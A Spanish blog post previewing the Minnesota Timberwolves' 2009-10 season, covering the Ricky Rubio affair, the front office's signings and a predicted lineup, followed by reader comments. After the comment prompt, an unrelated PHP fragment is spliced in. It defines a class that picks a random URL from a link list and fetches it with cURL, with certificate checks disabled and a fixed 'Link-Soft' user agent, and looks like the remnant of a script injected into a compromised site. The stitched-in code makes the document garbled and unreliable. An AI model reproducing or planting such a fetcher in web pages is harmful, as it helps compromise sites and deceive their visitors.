Minnesota Timberwolves: Víctimas del Rubio-Gate

05 de October de 2009 por TheDeerHunter

Ni en los mejores años de Kevin Garnett y Marbury se había hablado en este país del remoto equipo de Minneapolis tanto como estos meses. No podemos negar el interés mediático de nuestra joven perla. Si no hubiese sido por el Eurobasket, el verano del 2009 hubiese sido recordado durante mucho tiempo como el verano de Ricky Rubio. No vamos a entrar otra vez en el enjuiciamiento público de todo este complicado asunto, pero queda la sensación de que si el chaval quería salir de Badalona lo ha conseguido, si el Barça quería al jugador lo ha conseguido y si el Joventut quería una inyección económica también la ha conseguido. Aquí todo el mundo ha salido ganando. Todos, excepto los Wolves, al menos de momento.

Tras haberle dado matarile a McHale, la primera operación y la más arriesgada de Mr. David Kahn fue adquirir el pick nº5 buscando, se supone, a Ricky. No ha empezado con demasiado buen pie, da la impresión. Cierto que el restrictivo sistema NBA de adquisición de jugadores ajenos no les ha beneficiado en este caso y que desde un primer momento se contemplaba la posibilidad de no poder traerlo, pero es que la operación ha ido dando unos bandazos impresionantes. Desde los traspasos casi suicidas largando a cualquiera que pudiera jugar en la posición, a los dos primeros picks seguidos en guards (sobre los que todavía hay cachondeo en USA), continuando con el viaje a España, reuniendo todo el dinero que pudieron para intentar competir de una forma bastante ilusa con la oferta del Barcelona, y finalizando con el fichaje de Sessions a modo de asumir que la espera por Ricky puede ser bastante larga. El caso es que de momento se quedan sin el jugador que ha condicionado sus movimientos en offseason y veremos si algún día logran captarlo. Si sigue progresando en España como se espera, posiblemente hagan el agosto con él antes o después pero para valorar todo eso todavía quedan un par de añitos. Quién sabe quienes mantendrán su cargo en la franquicia hasta entonces.

Quizás el problema no es tanto el caso Ricky como los esfuerzos y la decisión que refleja todo el asunto con respecto al propósito de corregir la situación. Quitando posiblemente el fichaje de Kurt Rambis (hombre importante para los actuales campeones y del que hablan maravillas en L.A.) para sustituir a McHale, los movimientos para reforzar la plantilla han sido, diciéndolo suavemente, exageradamente timoratos.

¿Otra vez más viendo que pasa para el año siguiente? ¿Esperando quizás el 2010? No se creen ni ellos que van a engañar a ningún agente libre que tenga dos dedos de frente para hacer despegar un proyecto que no existe. Además, en el actual contexto económico la gente se piensa dos veces el pagar una entrada por asistir al pobre espectáculo de ver perder siempre a su equipo. La rentabilidad mueve muchos hilos en esta liga, ya lo sabemos, y no deberían fiarse de que nadie intente quitarles la silla (no sería ni el primer caso ni el último)

Vale, el fichaje de Sessions no está mal. Posiblemente sea incluso más realista que la opción que Ricky hoy por hoy, y siempre ha apuntado maneras de buen base que ahora está obligado a confirmar. Después se ha incorporado a Ryan Hollins, Pavlovic y Pecherov (que para colmo se les ha roto) que no son fichajes con los que uno pueda contar para darle un vuelco a la trayectoria deportiva de ningún equipo. Y por último los rookies Jonny Flynn y Wayne Ellington. No han arrasado el mercado de agentes libres, eso está claro. Da la sensación de que lo van a volver a pasar muuuy mal.

El equipo girará en torno a lo que pueda dar Al Jefferson, con quien no debería ser descabellado contar para las quinielas del All-Star. Lo ideal para él, quizás, sería tener un senter sólido al lado para dar lo mejor de si mismo, pero tener a Kevin Love no es ni de lejos salir en bragas a la batalla. Una pareja interior de altos vuelo pero cuyo momento no ha llegado todavía. Lo que tienen detrás es más peliagudo. Entre nuestro ídolo particular del “cacito powa”, Brian Cardinal con Mark Blount y los rutilantes Hollins y Pecherov lo van a tener difícil para cubrir la rotación con 5-10 minutos de calidad (entre todos).

El frontcourt lo completan Ryan Gomes y Corey Brewer. Los dos son opciones interesantes con potencial pero habrá que poner una o dos velitas para que la posición de 3 no se quede huérfana a mitad de temporada, y eso sin mencionar que quizás uno de los dos o ambos se vean obligados a reforzar otras posiciones. Ahora resulta que hay pluriempleados hasta en la NBA, qué cosas…

Para dirigir el equipo, todo nuevo. Da la impresión que Kahn tiene fijación por la posición. El único que queda del año pasado es Antonio Daniels (que llegó durante el último tramo de campaña) y ya no le podemos pedir mucho más que aportar la experiencia que acumula a sus nuevos compañeros. Creemos que Sessions no lo hará mal, y se dicen cosas buenas de Flynn.

El comentario de Mr. Kahn sobre jugar con dos bases simultáneamente parecía algún tipo de desbarre verbal en medio del jolgorio de la fiesta del draft, pero los escoltas con los que contará Rambis invitan a experimentar nuevas ideas. Damien Wilkins, Pavlovic y Wayne Ellington, salvo que este último se destape como un killer demoledor, piden a gritos que se incorpore algún refuerzo de calidad. Aún están a tiempo.

Quinteto inicial: Sessions, Brewer, Ryan Gomes, Kevin Love, Al Jefferson

6º Hombre: Jonny Flynn

Pronósticos: Candidatos potentes a la cuchara de madera.

Comenta

9 comentarios a esta entrada

  1. pcerezo dice:
    #1

    No voy a comentar nada de Minesota. Ya lo dije en un post anterior con otro equipo, simplemente pereza.
    Si no fuera porque el affair Ricky nos toca por se español creo que vuestro análisis hubiese sido mucho más corto.
    Lo único que se salva es Al Jefferson, creciendo y creciendo, con visos de ser All Star, contratazo y poder elegir equipo ganador.

    P.D.: habéis visto las imágenes de Garnett entrenando? si ese es su estado los Celtics lo llevan claro…

      Citar

  2. Txusma dice:
    #2

    Hombre creo que algo más se puede salvar al lado de Jefferson, sobretodo Kevin Love, una auténtica bestia reboteadora no carente de talento y aptitudes en ataques. Me parece un tremendo juego interior que ira para arriba con el paso de los partidos. Y que decir de un Sessions que ya demostró el año pasado que tiene sitio, (y de que manera) en esta liga. No ganarán pero si proponen un baloncesto visualmente atractivo no me atrevo a calificarlos de pereza.

    Ah! Me siento realmente ofendido (:D) de que pudieras pensar q sin el affaire Rubio no les hubiesemos prestado tanta atencion. Con lo enfermos q estamos por aqui!

      Citar

  3. TheDeerHunter dice:
    #3

    Solo hay que ver el resto de los análisis en los que no está… cortitos no son, vaya.
    De todas formas, es fácil verlo… si no hubiera pasado lo de RR habría un par de párrafos menos.

      Citar

  4. toni dice:
    #4

    No son ningun equipazo pero tienen un juego interior en el quinteto inicial que ya quisieran muchos equipos.
    No se como va a resultar Flynn pero creo que va a ser un indicador de el estado del equipo.
    El pronostico es bastante acertado a mi parecer…
    Pablo comenta lo de la rodilla de Garnett, yo tuve una lesion de rodilla y no cojeaba de esa manera aunque no se, puede entrar dentro de la recuperacion programada para el o de la imagen que quieran dar de su recuperacion aunque seria muy rebuscado.

    PD: Aunque parezca mentira, tengo unas ganas de levantarme a las 4:30…

      Citar

  5. pcerezo dice:
    #5

    Fue en las finales Chicago-Lakers?

      Citar

  6. Dantley2 dice:
    #6

    ¿Cortitos? Si tenemos que controlarnos hasta para los peores equipos de la liga, jaja

    De momento, una de las dos dudas (la otra es el 2) era si Sessions y Flynn jugarán juntos. Ayer nada, 48 minutos repartidos, ni uno más ni uno menos. Flynn de titular, Sessions de suplente, pero más o menos con los mismos minutos.

    Por lo demás, muy de acuerdo con el análisis. El 1 no está mal, potencialmente Flynn podría acabar siendo el mejor base del draft y Sessions ya es una realidad. El juego interior me gusta mucho con Jefferson y Love. El resto buff, no van a pasar mal y la profundidad de banquillo es muy poca.

      Citar

  7. Jabho dice:
    #7

    Nada, nada. El año que viene creo que vienen buenos bases en el draft y estos apuntan a pick alto…

      Citar

  8. Viva_Dirk dice:
    #8

    No creo que vayan a por un base habiendose gastado el dinero en Sessions y los picks 5 y 6 en bases, Flynn tendrá al menos un par de años con muchos minutos y salvo que les toque el Nº1 deberian elegir un escolta o un alero que también los hay de buen nivel.

      Citar

  9. Txusma dice:
    #9

    Love, lesionado hasta finales de Noviembre, principios de Diciembre…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>